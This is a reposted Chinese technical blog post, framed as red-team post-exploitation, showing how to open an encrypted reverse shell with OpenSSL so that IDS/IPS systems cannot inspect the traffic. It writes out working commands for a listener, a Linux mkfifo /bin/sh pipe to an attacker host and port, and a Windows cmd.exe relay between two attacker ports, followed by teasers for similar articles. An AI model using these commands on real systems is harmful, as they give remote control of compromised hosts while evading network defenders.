使用 OpenSSL 反弹加密 shell

最新推荐文章于 2024-05-09 14:38:44 发布
最新推荐文章于 2024-05-09 14:38:44 发布
阅读量226 收藏 1
点赞数
文章标签: shell 网络 操作系统
原文链接:http://www.cnblogs.com/heycomputer/articles/10697865.html
版权

Referrence:https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/

目录

前言

在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的

我们使用 nc 反弹 shell 进行测试

使用 wireshark 可以直接看到我们执行的命令和返回信息

在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。

OpenSSL 简介

在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份

利用 OpenSSL 反弹 shell 之前需要生成自签名证书

使用 OpenSSL 生成证书自签名证书

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

生成自签名证书时会提示输入证书信息,如果懒得填写可以一路回车

使用 OpenSSL 反弹加密 shell

Linux

假设我们从 A 主机反弹 shell 到 B 主机

------------------                  ----------------------
| A:172.16.1.175 |  --- shell ---> | B:172.16.1.174:1337 |
------------------                  ----------------------

首先需用利用上一步生成的自签名证书,在 B 主机上使用 OpenSSL 监听一个端口,在这里使用 1337 端口

命令为:

openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

此时 OpenSSL 在 1337 端口上启动了一个 SSL/TLS server

这时在 B 主机进行反弹 shell 操作,命令为:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 172.16.1.174:1337 > /tmp/s; rm /tmp/s

这样就使用 OpenSSL 反弹了一个加密的 shell

效果如下:

使用 wireshark 抓包可以看到,A 和 B 主机之间在使用 TLS1.2 协议进行加密通信

Windows

在 Windows 系统上反弹加密 shell 的方式有点不一样

具体命令如下:

openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

以上命令会从 [ip]:[port1] 获取命令发送给 cmd.exe执行,然后把结果返回到 [ip]:[port2]

因此在本机需要启动两个 s_server

port1 发送命令到 cmd

openssl s_server -quiet -key [keyfile] -cert [cert] -port [port1]

port2 获取发送给 port1 的命令执行结果

openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]

OpenSSL 还有很多功能,这里详细的列出了 OpenSSL 的常见使用方法

在渗透测试时,还可以使用 OpenSSL 搭建简易 HTTPS Server

使用 OpenSSL 搭建简易 HTTPS Server

使用以下命令前需要使用 OpenSSL 生成证书自签名证书,命令在上文中已给出

openssl s_server -key key.pem -cert cert.pem -accept 44330 -WWW

以上命令在 44330 端口启动了一个 HTTPS Server

参考链接

转载于:https://www.cnblogs.com/heycomputer/articles/10697865.html

weixin_30810583
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSL反弹加密shell
redwand的博客
02-21 400
在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。本文介绍了openssl反弹加密shell的常规方法。
Openssl反弹加密shell
干铮的博客
03-14 892
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法
最新发布
2401_84264491的博客
05-09 623
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
openssl命令_使用OpenSsl加密反弹shell
weixin_39713538的博客
11-24 334
一、实际环境:当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shellOpenSSL ...
利用OpenSSL反弹shell进行流量加密
jqx_Gold的博客
05-23 326
测试环境 攻击机:192.168.137.129(Kali) 靶机:192.168.137.128(CentOS) 1、在攻击机上使用OpenSSL生成自签名证书 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 2、 在攻击机上监听端口 openssl s_server -quiet -key key.pem -cert cert.pem -port [port] 3、在
红队隧道加密OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 983
OpenSSL是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
C语言使用openSSL库DES模块实现加密功能详解
08-30
C语言使用openSSL库DES模块实现加密功能详解 在本文中,我们将详细介绍C语言使用openSSL库DES模块实现加密功能的相关知识点。首先,我们需要了解DES加密的基本概念。DES(Data Encryption Standard)是一种对称加密...
PHP 使用openssl 扩展实现公钥加密的方法
10-18
接下来,你可以使用`openssl_public_encrypt()`进行公钥加密: ```php $data = 'test-string!'; openssl_public_encrypt($data, $encrypt_data, $pubkey); $encrypt_data = base64_encode($encrypt_data); ``` 这里...
thrift通过openssl加密证书实现双向通信
08-08
thrift框架通过vs2013编译好的静态库,然后通过vs2013实现双向通信代码,通信协议利用openssl加密证书的方式来实现,本资源给出了完整的实现代码,证书可以在网上百度一下,看看如何生成客户端和服务端的,然后编译...
C语言使用openSSL库AES模块实现加密功能详解
08-30
C语言使用openSSL库AES模块实现加密功能详解 加密分类 在密码学中,加密可以分为三种分类:对称加密、非对称加密和离散。 1. 对称加密:对称加密使用相同的密钥进行加密和解密。常见的对称加密算法有DES和AES。 2...
php实现基于openssl加密解密方法
10-21
主要介绍了php实现基于openssl加密解密方法,结合实例形式分析了php自定义函数实现基于openssl加密解密操作相关技巧,需要的朋友可以参考下
流量加密OpenSSL反弹加密
Welcome To Myon'Blog !
01-13 705
OpenSSL 是一个强大的、商业级的、功能齐全的开源工具包,用于 TLS(以前称为 SSL)、DTLS 和 QUIC(目前仅限客户端)协议,协议实现基于全功能通用加密库,也可以单独使用,还包括一个加密模块经过验证,符合 FIPS 标准,是一个安全套接字层密码库,囊括主要的密码算法、常用密钥、证书封装管理功能,主要用于实现ssl协议。
使用OpenSSL反弹shell
mirocky的博客
10-12 505
使用openssl进行反弹shell的过程
反弹Shell原理与实现
m0_62451321的博客
11-14 3119
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
ac2100 反弹shell无法粘贴_AC2100 刷OpenWrt过程记录
weixin_39767887的博客
12-23 1177
遇到的问题开启PPPoE服务器时,失败python脚本执行失败,并报错,说None什么的,修改了一下代码;位置‘redmi\PPPoE_Simulator.py’,修改方法:在63行添加代码host_uniq = ""反弹Shell失败原因:原始官方版本2.0.3x版本,已经不能再用之前的版本的方法了。解决办法:降级的1.0.14版本,可使用的官方文件“miwifi_rm2100_firmware...
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 345
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
shell openssl_OpenSSL Shell命令教程与示例
cunjiu9486的博客
10-08 1311
shell opensslOpenSSL is free security protocols and implementation library provided by Free Software community. OpenSSL libraries are used by a lot of enterprises in their systems and products. OpenSS...
linux openssl 反弹加密 shell
whatday的专栏
04-09 486
前言 在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。 我们使用 nc 反弹 shell 进行测试 使用 wireshark 可以直接看到我们执行的命令和返回信息 在这种情况下当我们进行操作时,网络防御检测系统(ID...
反弹shell初识
无痕的博客
11-01 3997
反弹shell的指令与演示
怎么使用openssl进行文件加密
05-31
使用 OpenSSL 进行文件加密的方法如下: 1.生成密钥对 使用 OpenSSL 生成密钥对,可以使用以下命令: ``` openssl genrsa -out private_key.pem 2048 openssl rsa -in private_key.pem -out public_key.pem -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值